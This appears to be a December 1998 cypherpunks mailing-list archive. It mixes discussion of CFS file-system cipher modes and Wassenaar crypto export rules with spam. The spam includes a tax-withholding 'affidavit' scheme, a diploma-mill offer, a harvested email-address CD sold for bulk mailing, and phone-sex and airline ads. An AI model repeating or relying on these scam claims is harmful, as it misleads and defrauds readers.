Our method is 100% legal,  honest and ethical. We will pay anybody 
$1,000 if they can  prove our method is ILLEGAL, DISHONEST or 
UNETHICAL!!! Our method has worked for every person who has ever 
bought this package without exception. We have been selling our 
package for over 2 years and have NEVER HAD ANY COMPLAINTS!

                    NOBODY HAS EVER FAILED!!!

YOUR PAYCHECKS WILL BE 10% TO 35% BIGGER EVERY WEEK, within weeks
of filing the proper forms and affidavit. WHY NOT GIVE YOURSELF A 
RAISE THIS YEAR BY EXERCISING AND ENJOYING MORE OF YOUR CONSTITU-
TIONAL RIGHTS. SET YOURSELF FREE!
-------------------------------------------------------------------
Your package includes unlimited LIFETIME telephone consultations,
a copy of the U.S. Constitution, The Bill of Rights, forms, 
affidavits, and much,  much more!

Knowledge Equals Freedom! Shouldn't you get yours!

--------------------- ORDER FORM - CUT ----------------------------

TO ORDER BY MAIL:
Send this order form plus your Name, Address, Phone # and 
a $59 + $3 S&H - $62 Total (Money Order Only) to:

LINKCO -- Dept. # N0001 -- POB 66781 -- Phoenix, AZ 85082   
Phone: (602)267-9688

                  Thanks for reading this message!
               -(Unconditional Money Back Guarantee)- 
                     - Copyright 1996 Linkco -
==================================================================
To be REMOVED from this list type REMOVE in the subject area of
a new e-mail and send to:  CharlieEcho14@hotmail.com
==================================================================

 
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alexander Kjeldaas <astor@guardian.no>
Date: Sun, 13 Dec 1998 15:12:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: cfs' ecb+ofb mode vs. interleaved cbc mode
Message-ID: <19981214001208.B25332@lucifer.guardian.no>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 2761
Lines: 57


For fast file-system crypto, you really want to implement the ciphers
so that you encrypt several blocks at a time.  CFS does this by using
a special mode (described as ecb+ofb by schneier).  The CFS
documentation explains:


"At attach time, CFS derives from the passphrase into two DES keys, K1
and K2.  K1 is used to create two (or three) DES pseudorandom stream
ciphers, each 128KB long, S1 and S2.  To encrypt a file block, it is
first XORd against a unique bitstream derived from the inode number of
the file.  The result is then XORd against S1 based on its offset in
the file.  This is then DES ECB encrypted with K2, and the result of
that is XORd against the appropriate position in S2.  The resulting
ciphertext is what is stored.  The cipher is reversed in the obvious
manner.  Filenames are similarly encrypted.

There does not appear to be a feasible attack that allows an
independent search for the two subkeys K1 and K2; in a brute-force
known-plaintext attack, an attacker would have to try all 2**112 key
combinations.  Note that in the single DES mode, the two keys may be
vulnerable to independent exhaustive search under a so-called "linear"
attack, but this attack appears to require a large number of chosen
plaintexts encrypted under the same inode number.  Under most
conditions where the attacker cannot introduce large numbers of chosen
plaintexts, I believe even the single-DES CFS encryption to be very
strong in practice.  Note that this is not the same as a "proof".  In
any event, CFS is always at least as secure as DES or triple DES (as
selected when the directory is created).  If want high security,
select triple DES (now the default); for better performance, use the
hybrid single-DES option."


I'd like to know how this method compares to using an interleaved cbc
mode - for example 8-way interleaved cbc.  The n-way interlaved
cbc-mode works by chaining each n'th block together instead of each
block.  This means you get n more messages.  For a 512-byte block and
a 128-bit block length, this means that each message will be
512/(8*16) = 4 blocks long.  For a 4k block you get messages that are
32 blocks long.  This might or might not be a problem.

With CFS you need 2x the key material - something that is really hard
to get by when you're using 256-bit keys.  It seems to me you'll have
to type in an extremely long password or each of the keys will in
practice be weaker than what the theory tells you.  Another point is
that CFS requires a lot more nonswappable memory than interleaved cbc
mode. This means that interleaved cbc mode initially seems more
attractive for file-system use.  Am I missing something?

astor

-- 
 Alexander Kjeldaas, Guardian Networks AS, Trondheim, Norway
 http://www.guardian.no/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tre64t3@rubicon.bf.rmit.oz.au
Date: Mon, 14 Dec 1998 02:27:28 -0800 (PST)
To: bo46dy@seanet.com
Subject: req!
Message-ID: <199812141027.CAA29086@toad.com>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 467
Lines: 24



UNIVERSITY DEGREE PROGRAMS

Increase your personal prestige and money 
earning power through an advanced 
university degree. 

Eminent, non-accredited universities will 
award you a degree for only $200. 

Degree granted based on your present 
knowledge and experience.  No further 
effort necessary on your part.

Just a short phone call is all that is required for a 
BA, MA, MBA, or PhD diploma in the field of your 
choice. 

For details, call 602-230-4252





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: theball@matzah.cc
Date: Mon, 14 Dec 1998 00:11:49 -0800 (PST)
To: jewishprof@yahoo.com
Subject: Nation's Biggest Jewish Singles Event:  Dec. 24 @ Webster Hall
Message-ID: <36143.124674421299200.166288@localhost>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 4461
Lines: 112


*******************************************************************
      If you would like to continue to receive e-mail notifications 
regarding UTOPIA's events for Jewish Singles, please let us know by 
sending us an e-mail at theball@matzah.cc.  Please note that this is 
a one-time mailing only.  if we do not hear from you, we will never 
e-mail you again and we thank you for your time.
********************************************************************

"A high-end event," "awash in cocktail dresses," 
"attended by Cosmopolitan's Bachelor of the Month" and  
"3,000 guests who schmoozed their way over three vast floors." 
					-- New York Magazine

"Not a creature stirs on Christmas Eve . . . but that's not at 
this annual party for the city's young and Jewish where some 
3,000 people turned out to dance, romance and kick back last year."   
					-- New York Daily News

"By midnight the nightclub was alive" with 
"4,000 partygoers" at this "holiday alternative for 
Jewish urbanites on their single most silent night of the year."
					-- The New York Times
********************************************************************


The Nation's BIGGEST Event for Jewish Singles
Each Year Since 1995!

Thursday, December 24, 8 p.m.- 4 a.m.
THE BALL '98 at 
WEBSTER HALL
(125 E. 11th St., between 3rd and 4th Aves, NYC)
************************************************
4 FLOORS, 4 DJs, 7 UNIQUE ROOMS, 3000+ EXPECTED
Grand Ballroom, Live Trapeze, Martini Bar, Jazz Club, Cigar 
Lounge, Coffee Bar, Flashback Disco, Sports Bar, BlackHole 
Lounge, more!  
Please dress with style
************************************************************

      Hi, we have sent you this e-mail because we thought you might 
have interest in "The Ball '98"  -- the Nation's Largest Party for 
Jewish Singles in their 20's and 30's.   "The Ball '98" is sponsored 
by UTOPIA Events.  UTOPIA also sponsors the annual "Turkey Ball" on 
Thanksgiving Eve and other events for Jewish Singles.

      If you would like to continue to receive e-mail notifications 
regarding UTOPIA's events for Jewish Singles, please let us know by 
sending us an e-mail to theball@matzah.cc.  Please note that this is 
a one-time mailing only.  if we do not hear from you, we will never 
e-mail you again and we thank you for your time.

THE BALL '98
THE NATION'S BIGGEST EVENT FOR JEWISH SINGLES!

       Our annual Ball is the nation's biggest event for Jewish Singles 
in their 20's and 30's.  In 1995, over 3000 young Jewish singles
attended the Ball when we held it at the Palladium.  In 1996, over 
3,500 attended at Webster Hall.  Last year, over 4000 people attended 
this event when we held it at The Tunnel and the party was covered by 
The New York Post, The Daily News, The New York Times, and more.  

      
THE BALL '98
4 FLOORS 4 DJs, 7 UNIQUE ROOMS

The Ball '98 offers something for everyone: 

	GRAND BALLROOM:  For the Ball '98, Webster Hall's Grand 
Ballroom will be the site of the Main Party -- the place to meet 
and mingle with thousands of young Jewish singles, featuring 
dance music from a legendary DJ.  We will work to ensure that 
the atmosphere in the Grand Ballroom (and The Ball '98 generally)
is conducive to meeting and mingling.

	THE MARTINI BAR & JAZZ CLUB:  Make this your place for 
intimate conversation.  

	TTHE TRAPEZE SHOW:  At 11:45 p.m., a trapeze artist defies 
death and gravity high above the Grand Ballroom -- without a net!  
Not for the faint-hearted.

	AND THERE'S SO MUCH MORE TO EXPLORE:  The Coffee Bar, The 
Sports Bar, the Cigar Lounge, The Flashback Disco featuring music 
from the 70's and 80's, the Black Hole Lounge, and more!

	FOUR ENTRANCES, HUGE COAT CHECK:  So that you can quickly 
enter and enjoy the Nation's Largest Jewish Singles Event, we have 
made arrangements to use four entrances to Webster Hall and to 
expand Webster Hall's already large coat check.

ADMISSION

         Admission to The Ball '98 is $20 in advance and $25 at the 
door (we have added more cashiers this year to make entry easy).  For 
information on purchasing tickets in advance, please call Utopia at 
212.459.4321 or e-mail us at theball@matzah.cc.

QUESTIONS?

       If you have any questions about The Ball '98 or any other 
matter, please feel free to e-mail us (theball@matzah.cc) or call 
Utopia directly at 212.459.4321

         Thanks and we look forward to seeing you on December 24 
at Webster Hall for The Ball '98. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Sun, 13 Dec 1998 23:47:40 -0800 (PST)
To: Alexander Kjeldaas <astor@guardian.no>
Subject: Re: German government press release on Wassenaar
In-Reply-To: <v04020a1bb2941c8e1795@[139.167.130.246]>
Message-ID: <3674C269.BBE545D5@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 1762
Lines: 53


Alexander Kjeldaas wrote:
> 
> On Wed, Dec 09, 1998 at 08:04:00PM +0100, Ulf Mller wrote:
> >
> > 2.) The government has acknowledged that public domain software
> > remains unrestricted. This also applies to copyrighted software such
> > as PGP which "has been made available without restrictions upon its
> > further dissemination".
> 
> I applied for an examination of the Open Source definition to the
> department for foreign affairs in Norway.  The response (no surprise)
> was that Open Source is compliant with what the Wassenaar-agreement
> calls "public domain" software.

I posed a question in this direction in sci.crypt in the thread
'(fwd) Strike to protest Wassenaar!' to which Doug Stell gave a
follow-up on 11 Dec 14:19:24 which is attached below.

M. K. Shen

____________________________________________________


On Fri, 11 Dec 1998 11:50:12 +0100, Mok-Kong Shen
<mok-kong.shen@stud.uni-muenchen.de> wrote:

>>    2. "In the public domain".
>
>This is indeed very interesting. If someone implements a strong 
>crypto algorithm with 128 key bits and places it on an ftp-server 
>for free download, then that is by definition in the 'public domain' 
>and hence according to the above not subject to export regulations. 
>Could someone explain this paradox?

a. "Public domain" is defined in the document you refer to, by the
indentations under Item 1.

b1. 128-bit software is never exempt.

b2.  64-bit software is exempt if you meet ALL of the other criteria.

b3. The limit of exemption is 56 bits, if you do not meet all of the
other criteria.

See my other response where this is explained from Catgory 5 - Part 2.
Unfortunately, one key statement is missing from the General Software
Note and it contains the magic word "ALL."

doug




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wilson, Jamie (J.R.)" <jwilso37@visteonet.com>
Date: Mon, 14 Dec 1998 05:52:04 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: RE: Postcard Debates
Message-ID: <199812141352.IAA01172@mailfw2.ford.com>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 3248
Lines: 97


The problem with the USPS is that it is government run -- like anything
government run, it doesn't work right.  It's too expensive, too slow, and
too unreliable.  Email, on the other hand, is largely handled by the private
sector.  Hence, it works better.  

What I find interesting (in response to your note that the USPS would
charge), is that the U.S. government had to actually pass a law to make sure
the U.S. government doesn't start taxing the Internet.  

____________________________________________________
Jamie R. Wilson                     


-----Original Message-----
From: Reeza! [mailto:howree@cable.navy.mil]
Sent: Friday, 11 December, 1998 20:51
To: cypherpunks@toad.com
Subject: RE: Postcard Debates


This would open the door for the USPS to charge for each email sent. 
The same rules? No. Based on those rules, but not the same rules.
The same rules would slow email down considerably also, wouldn't they???<g>

Reeza!



At 08:41 AM 12/11/98 -0500, Wilson, Jamie (J.R.) wrote:
>If everyone just encrypted their messages then no suspicions would be
raised
>regarding the use of encryption.  Most people use envelopes, plain and
>simple -- and as a result no one questions what they are hiding.  It's
>understood that mail is private and therefore people have a right to seal
it
>in an envelope and not worry about people tampering with it.  On the same
>note, there are federal regulations and penalties (in the U.S. anyway) for
>tampering with mail and interrupting the delivery of it.  The same laws
>should apply to email.
>
>____________________________________________________
>Jamie R. Wilson                     
>
>
>
>-----Original Message-----
>From: Robert Wenzler [mailto:rwenzler@usachoice.com]
>Sent: Thursday, 10 December, 1998 13:56
>To: Mbishop645@aol.com
>Cc: maven@weirdness.com; hab@gamegirlz.com; Cypherpunks@toad.com
>Subject: Re: 
>
>
>
>
>Mbishop645@aol.com wrote:
>> 
>> >HaB wrote:
>> ><snip>
>> >>     That's a good place to begin, though.  "Would you send a letter to
>> >> someone without an envelope?"  "Then why not put your email in the
>> >> electronic equivalent of one?"
>> >>
>> >> balance.
>> >
>> >Would I send a letter to someone without an envelope?
>> >One word: postcard.
>> 
>> Ahh, but would you tape a check for your phone bill to a postcard? Other
>> than writing a greeting to someone what else do you use a postcard for?
>
>No, I would not tape a phone bill check to a postcard. There is the 
>chance for it to fall off.
>
>There is different methods of sending mail for different levels of
>security and functionality. Some people make it obvious what is inside
>an envelope. (who would not recognize a Christmas card from the
>envelope?) Others make it as bland and normal as possible to
>have it go by without much notice.
>
>It all depends on how secure you want it. Some things you can do
>with what amounts to postcard security.
>
>What amount of security do you want for your email? Would you be
>willing to do something extra for that security?
>
>This type of question is up to each person. How much risk is the
>person willing to take. Each person has the responsibility to
>understand what the risks are and to decide what risks they are
>willing to take.
>
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alexander Kjeldaas <astor@guardian.no>
Date: Mon, 14 Dec 1998 02:06:22 -0800 (PST)
To: Mok-Kong Shen <astor@guardian.no>
Subject: Re: German government press release on Wassenaar
In-Reply-To: <v04020a1bb2941c8e1795@[139.167.130.246]>
Message-ID: <19981214110616.B20823@lucifer.guardian.no>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 892
Lines: 31


On Mon, Dec 14, 1998 at 08:46:49AM +0100, Mok-Kong Shen wrote:
> 
> a. "Public domain" is defined in the document you refer to, by the
> indentations under Item 1.
> 
> b1. 128-bit software is never exempt.
> 
> b2.  64-bit software is exempt if you meet ALL of the other criteria.
> 
> b3. The limit of exemption is 56 bits, if you do not meet all of the
> other criteria.
> 
> See my other response where this is explained from Catgory 5 - Part 2.
> Unfortunately, one key statement is missing from the General Software
> Note and it contains the magic word "ALL."
> 

I haven't heard anything about there not being any exemption on
128-bit crypto.  To my knowledge there is a general exemption on all
Open Source software, regardless of the key length.  However, I will
check into this.

astor

-- 
 Alexander Kjeldaas, Guardian Networks AS, Trondheim, Norway
 http://www.guardian.no/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Mon, 14 Dec 1998 03:07:41 -0800 (PST)
To: Alexander Kjeldaas <astor@guardian.no>
Subject: Re: German government press release on Wassenaar
In-Reply-To: <v04020a1bb2941c8e1795@[139.167.130.246]>
Message-ID: <3674F0E6.3BC542D5@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 1514
Lines: 42


Alexander Kjeldaas wrote:
> 
> On Mon, Dec 14, 1998 at 08:46:49AM +0100, Mok-Kong Shen wrote:
> >
> > a. "Public domain" is defined in the document you refer to, by the
> > indentations under Item 1.
> >
> > b1. 128-bit software is never exempt.
> >
> > b2.  64-bit software is exempt if you meet ALL of the other criteria.
> >
> > b3. The limit of exemption is 56 bits, if you do not meet all of the
> > other criteria.
> >
> > See my other response where this is explained from Catgory 5 - Part 2.
> > Unfortunately, one key statement is missing from the General Software
> > Note and it contains the magic word "ALL."
> >
> 
> I haven't heard anything about there not being any exemption on
> 128-bit crypto.  To my knowledge there is a general exemption on all
> Open Source software, regardless of the key length.  However, I will
> check into this.

I think that without looking at any official texts this is very clear 
from the motivation of the Wassenaar effort: They don't want strong 
crypto ever to be used by common people. So they can't allow
128-bit crypto for free export in any case. Quite misleading, at
least in my opinion, is their use of the word 'public domain' 
software, which most people understand to be software which anyone 
can download free of charge.

BTW, does anyone have an idea of how long would it take before
the clauses of Wassenaar become effective in the countries concerned?
It can't be intstantly effective, can it? (Laws have to be officially
published.)

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alexander Kjeldaas <astor@guardian.no>
Date: Mon, 14 Dec 1998 03:12:31 -0800 (PST)
To: Mok-Kong Shen <astor@guardian.no>
Subject: Re: German government press release on Wassenaar
In-Reply-To: <v04020a1bb2941c8e1795@[139.167.130.246]>
Message-ID: <19981214121225.A31377@lucifer.guardian.no>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 474
Lines: 20


On Mon, Dec 14, 1998 at 12:05:10PM +0100, Mok-Kong Shen wrote:
> 
> BTW, does anyone have an idea of how long would it take before
> the clauses of Wassenaar become effective in the countries concerned?
> It can't be intstantly effective, can it? (Laws have to be officially
> published.)
> 

No laws have to be changed.  This is just a "small" change to an
existing law.

astor

-- 
 Alexander Kjeldaas, Guardian Networks AS, Trondheim, Norway
 http://www.guardian.no/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ti3882@yahoo.com
Date: Fri, 18 Dec 1998 10:38:40 -0800 (PST)
Subject: your web site
Message-ID: <199812181834.KAA09451@toad.com>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 1800
Lines: 78



            We'll Submit Your Site To 

                    Over 900

     Search Engines, Directories, & Indices

         For A "One Time Cost" Of Only

                    $39.95


     ***  100% Money Back Guarantee  ***

*** Immediately Increase Your Sites Exposure ***

 For Less Than 4 Cents Each We Will Submit Your
 Web Site To Over 900 Of The Net's Hottest Search 
 Engines, Directories & Indices.

 If your site isn't listed in the Search Engines,
 how can people find you to buy your products 
 or services?
 
 For just $39.95 we'll take the work load off your
 back instead of you trying to do it manually which
 can take days to do.

 We're the professionals that are here to help
 you have a shot at having a successful marketing
 experience with the internet.

 You know as well as we that your time is
 best utilized managing your business and not
 sitting at some keyboard hours upon hours
 trying to save less than 4 cents for each  
 submission. See how it's kind of crazy to try
 to tackle this on your own.  It's just not 
 cost effective to try to do this yourself to
 save just $39.95.

 See why thousands and thousands of businesses 
 world wide both large and small have come to 
 us to utilize our services.  Hotels, Motels,
 On-Line Stores, Travel Agents, Colleges, 
 Universities, Governments, Fortune 500 companies,
 Movie Studios, Chambers Of Commerce and many,
 many more.  Shouldn't you give us a call now?

 To Learn More, Call Us At The Numbers Below.
 
 Call us toll free at (800) 771-2003 in the USA
 and Canada or outside the USA at (916) 771-4739
 and we'll provide you with all the necessary
 information to get you submitted Right Away.






To be removed from our mailing list, please
respond with the word remove in the subject.
 
 
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: smo@clinet.fi
Date: Mon, 14 Dec 1998 03:30:54 -0800 (PST)
To: smo@clinet.fi
Subject: JUST RELEASED  VOL. 2
Message-ID: <011718706870122442@mf_willowstike.com>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 7635
Lines: 192



JUST RELEASED!!!
INTRODUCING...THE CD VOL. 2   

The CD - Vol. 2, is the absolute best product of its' kind anywhere 
in the world today.  There are no other products anywhere that can 
compete with the quality of this product.

We took a total of over 190 million email addresses from many of the
touted CD's that are out there (bought them all - some were $300+)!
We added the millions we had in storage to those.   When we
combined them all, we had in excess of 300+ million addresses
in one huge file.

We  ran a super "sort/de-dupe" program against this huge list. It 
cut the file down to less than 20 million!!! Can you believe that? It 
seems that most people that are selling CD's are duping the public by 
putting numerous files of addresses in the CD over and over. This 
created many duplicate addresses. They also had many program "generated" 
email addresses like CompuServe, MCI, ANON's, etc.  This causes a 
tremendous amount of undeliverables.

After completion of removal of duplicates and initial filtering we were 
left with the base of 10 Million addresses worth fine tuning to finish the 
project.  Remember, we are not here to produce the CD with the gad zillion 
millions that our competitors are so proud to put their names on these days.  
We ARE here to produce the very BEST CD list as far as quality of 
addresses go

We then ran a program that contained 300+ keywords to remove addresses
with vulgarity,  profanity, sex-related names, postmaster, webmaster, flamer, 
abuse, spam, etc., etc.   Also eliminated all .EDU, mil, .org, .GOV, Genie, 
Delphi, GNN, Wow etc.   We also filtered out all addresses found in any of 
our 1300+ domains list.  We also filtered out addresses in excess of 30,000 
which have proven to be affiliated with anyone found to be opposed to our 
using direct bulk email as a advertising medium. We have also purged the 
list to be free of any "web poison" addresses created by those who are opposed 
to us conducting legitimate business on the internet today.  If you do not know 
what web poisoned addresses are, please look it up now.  One list we recently 
purchased had over 90% poisoned addresses.  The "bottom line" here is that 
you can go out on the world market today and purchase every lists for thousands 
of dollars and NOT have anymore worth owning than what we have compiled 
for you here today.

You use these addresses, you will experience increased response, increased 
sales, and a host of other positives that far exceeds any hoped for results when 
using the competitor's inferior products.  Our customers purchase our products 
over and over and over.  Most of the competition ever succeeds is selling a 
second product to anyone after they purchase the first.

  So, you see, our list will save people hundreds of dollars buying all others that are 
out there on  CD and otherwise. Using ours will be like using the 200+ million that 
we started with, but a lot less money and a lot less time!!
 
We have always said, "You can buy from the REST or you can buy from the BEST".   
Your choice.

                     _____________________________

                       What others are saying:

"I received the CD on Friday evening.   Like a kid with a new toy, I
 immediately started bulking out using the new email addresses.  Over
 the course of the weekend, I emailed out over 500,000 emails and I
 received less than TWENTY undeliverables!!  I am totally satisfied
with my purchase!!  Thanks Premier!!"
                              Dave Buckley
                              Houston,  TX
 
 "This list is worth it's weight in gold!!  I sent out 100,000 emails for my
 product and received over 55 orders!
                               Ann Colby
                            New Orleans, LA
 
                ****************************************
 
                                 HERE'S THE BOTTOM LINE
 
The CD is comprised of 7 million PREMIUM & SUPER clean addresses -ready 
for mailing upon receipt of the CD.  Each file contains exactly 100,000 email 
addresses. There are only AOL & Mixed addresses on this CD.  You have 50 files 
of 100,000 each of AOL to equal 5,000,000 addresses.  The AOL addresses are less 
than 6 weeks old and have been collected throughout the production schedule.
 
The remaining files are comprised of General Internet addresses. There are 20 files 
of 100,000 each, totaling 2,000,000 premium addresses.   NO Compuserve!  No Delphi!
No Genie!  No Prodigy!  NO Filler Addresses!  Simply the Best of the Best!!!

 
                           >>> ONLY $200.00!
 
This price is effective for the next seven days, thereafter the price will be
$299.00 so ORDER NOW!  Remember, bottom-line you always get what you pay for!

All lists are completely free of any Duplicates. We also on a continual basis, add 
New Names and Remove Undeliverables and Remove Requests. The result is the 
Cleanest Email Addresses Available Anywhere to use over and over again, for a 
FRACTION of the cost that other companies charge. Typical rates for acquiring 
email lists are from 1cent to as high as 3 cents per email  address - that's  
"INFORMATION HIGHWAY" ROBBERY!.

We continually work on our CD.  Who knows when those other CDs were made. 
We're constantly adding and deleting addresses, removes. Etc.  It all comes back 
to quality.

Don't even hesitate on this one or you will miss out on the most effective way to 
market anywhere...PERIOD!  If you have any further questions or to place an order, 
you can call toll free at:


800-600-0343  Ext. 2693


To order our email package, simply print out the EZ ORDER FORM
below and fax or mail it to our office today.
 
We accept Visa, Mastercard, AMEX, Checks by Fax.
 
 _________________
EZ Order Form
 

 _____Yes! I would like to order MILLIONS Vol. 2  email addresses
for only $200.00.
 
*Please select one of the following for shipping..
 
____I would like to receive my package OVERNIGHT. I'm including
$15 for shipping. (outside US add an additional $25 for shipping)
 
____I would like to receive my package 2 DAY delivery. I'm including
$10 for shipping.  (outside US add an additional $25 for shipping)
 
DATE_____________________________________________________
 
NAME____________________________________________________

COMPANY NAME___________________________________________

ADDRESS_________________________________________________

CITY, STATE, ZIP___________________________________________
 
PHONE NUMBERS__________________________________________
 
FAX NUMBERS_____________________________________________
 
EMAIL ADDRESS___________________________________________
 
TYPE OF CREDIT CARD:
 
______VISA _____MASTERCARD
 
CREDIT CARD# __________________________________________
 
EXPIRATION DATE________________________________________
 
NAME ON CARD___________________________________________
 
AMOUNT $____________________
 
 
(Required) SIGNATURE:x________________________
 
DATE:x__________________
 
You may fax your order to us at:   1-212-504-8192
 

CHECK BY FAX SERVICES!
 
If you would like to fax a check, paste your check below and fax it to
our office along with all forms to: 1-212-504-8192

******************************************************

***24 HOUR FAX SERVICES*** PLEASE PASTE YOUR
 
CHECK HERE AND FAX IT TO US AT 1-212-504-8192
 
*******************************************************
 
If You fax a check, there is no need for you to send the original check.
We will draft up a new check, with the exact information from your
original check. All checks will be held for bank clearance.  (7-10 days)
Make payable to: "GD Publishing"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 785
Date: Mon, 14 Dec 1998 22:32:08 -0800 (PST)
To: user@the.internet
Subject: CALL 1-800-HOT-PUSSY....CALL NOW!!
Message-ID: <05130043702493@netcast.ipsoa.it>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 651
Lines: 33


Hi Sexy,

I am lonely waiting for you to call me. Let me be the "Little Secret" in 
your life!

WARNING!!

These lines are extremely xxx-rated. Adults over 18 only!!! Sex starved
girls will give you a hot sexual experience you'll never forget. Not
recommended for people with weak hearts or bad backs!!!


Call 1-800-HOT-PUSSY(468-7877)

$2.99-$4.99 per min.        Billed by Teleworld
Visa/Mastercard/Amex      Must be over 18


Call 1-900-288-LIVE(5483) (US ONLY)

Billed as 1-ON-1 on your phone bill
$25.00 per call    Must be over 18


1-900-451-PUSSY(7877) (Canada)

$2.99-$4.99 per min. (US $)

CALL NOW!!!     CALL NOW!!!       CALL NOW!!!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dave@liveauctiononline.com
Date: Tue, 15 Dec 1998 15:09:07 -0800 (PST)
To: dave@liveauctiononline.com
Subject: Free Banner offer from LAO---
Message-ID: <199812152305.PAA16803@liveauctiononline.com>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 1438
Lines: 30


 
Hi :)
We are looking for a limited number of reputable online companies who are interested in using our online auction to sell their products. We think that we can work together to help each other promote our on-line store-fronts. 

We would like you to become an "Anchor Tenant" at L.A.O.,  here is how it works:

- We will place "Your Banner" in a  category that  matches the type of items that you sell. 
- Bidders access "only your" items by clicking on "Your Banner". 
- You guarantee to keep a minimum of 100 auctions running at L.A.O.
- You provide a reciprocal link from your site to ours.
- NO LISTING FEE, you only pay a small % only on the items that sell.
 
What are the benefits:

Exposure - we place only "Your Banner" in the Your Category.
Exposure - we link "Your Banner" to your web site!!
Exposure - only "your auctions" are featured in your selected Category.


Live Auction Online is currently getting over 1,000,000 hits a month and we have close to 10,000 members. Please let us know as soon as possible, we have a limited number of categories and we will only place 1 Banner in each category!! 

Go to http://www.liveauctiononline.com and click on the "Beanie" category to see how our "Anchor Tenancy" works. Also, click on the link on our front page to get more info on our "Anchor  Tenancy". 

Also, please send your website address and aprox. hits you are recieving if you have advertising on your site.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Trans World Specials" <twaweb@inet2.twa.com>
Date: Tue, 15 Dec 1998 12:47:27 -0800 (PST)
To: Trans World Airlines Customers <twaweb@inet2.twa.com>
Subject: Trans World Specials Fare Sales
Message-ID: <19981215163725.21354.qmail@inet2.twa.com>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 7253
Lines: 214


Welcome to Trans World Specials for December 15th, 1998.
 
 This week marks the beginning of a great enhancement
 for Trans World Specials.  To make it easier for you,
 telephoning is no longer necessary.  After you read over
 the list of Trans World Specials just point your browser to
 http://www.twa.com/hotdeals
 and book your trip directly on our website. 
 It's easy and only takes a minute. Just point and click. 
 
 All tickets must be purchased between December 15
 and December 18, 1998. All domestic fares allow travel
 to originate in either direction, except New York/Las Vegas,
 which may originate in New York only. Travel to St. Maarten
 may originate in New York City only. 
 
 Did you know TWA has gift certificates available 
 for you to give to your friends and family? Read 
 all about it on our home page at http://www.twa.com
 
 
 On to this week's Trans World Specials.
 
 
 *************INTERNATIONAL************
 
 
 Roundtrip fare from NEW YORK, NY (JFK) to:
 (Depart New York on December 17 or 18 and 
 return December 19-21, 24, 25)
 
 Fare:	City:
 
 $248	St. Maarten, Netherlands Antilles
 
 
 ************DOMESTIC*****************
 
 Roundtrip fare between ST. LOUIS, MO and:
 (Depart Friday 12/18 after 7 p.m. and 
 return Monday or Tuesday 12/21 or 12/22)
 
 Fare:	City:
 
 $129	Atlanta, GA
 $139	Dallas/Ft. Worth, TX
 $139	Pittsburgh, PA
 $89	Wichita, KS
 
 
 Roundtrip fares between ST. LOUIS, MO and:
 (Depart Friday 12/18 after 7 p.m. or all day
 12/19 and return Monday or Tuesday 12/21 or 12/22)
 
 Fare:	City:
 
 $89	Dayton, OH
 $69	Louisville, KY
 $69	Springfield, MO
 
 
 
 
 
 Roundtrip fare From NEW YORK, NY (JFK) to:
 (Depart Friday 12/18 or Saturday 12/19 and 
 return Monday or Tuesday 12/21 or 12/22. Nonstop)
 
 Fare:	City:
 
 $239	Las Vegas, NV
 
 
 **************ALAMO****************
 
 Alamo offers the following low rates valid 
 12/12/98 - 12/14/98.  
 
 $17.49	Las Vegas, NV -	St. Louis, MO
 
 $20.49	Atlanta, GA - Pittsburgh, PA
 
 For reservations call Alamo at 1-800-GO-ALAMO and 
 request rate code RT and ID # 443833. For online 
 reservations visit Alamo at:  http://www.goalamo.com
 
 
 ********HILTON HOTELS/RESORTS****************
 
 
 Hilton Hotels/Resorts offers these low rates valid the
 night of 12/18/98 - 12/21/98.
 
 $59	Hilton Arlington - Arlington, TX
 	(Includes breakfast for two! Visit Six Flags	
 	Over Texas and Hurricane Harbor)
 
 $85	Hilton Atlanta & Towers - Atlanta, GA
 	(Downtown near Peachtree Center, SCITREK
 	museum, and the Underground)
 
 $49	Hilton Atlanta Northwest - Atlanta, GA	
 	(Convenient to Six Flags, Marietta, and 
 	downtown Atlanta)
 
 $79	Hilton Dallas Parkway - Dallas, TX
 	(N. Dallas location, free shuttle to Galleria
 	and Valley View Shopping Malls)
 
 $76	The Seelbach Hilton Louisville - Louisville, KY
 	(Located in downtown Louisville close to 
 	shopping, fine dining and theatres)
 
 $85	Hilton Pittsburgh & Towers - Pittsburgh, PA
 	(Near theatres, museums, and restaurants, 
 	overlooks Pointe State Park)
 
 $89	Hilton St. Louis Frontenac - St. Louis, MO
 	(Free airport shuttle and parking, located 
 	midtown near shopping and entertainment)
 
 For reservations call Hilton at 1-800-774-1500 and ask 
 for Hilton Value Rates. Visit Hilton online at 
 http://www.hilton.com
 
 
 ***************TERMS & CONDITIONS**************
 
 
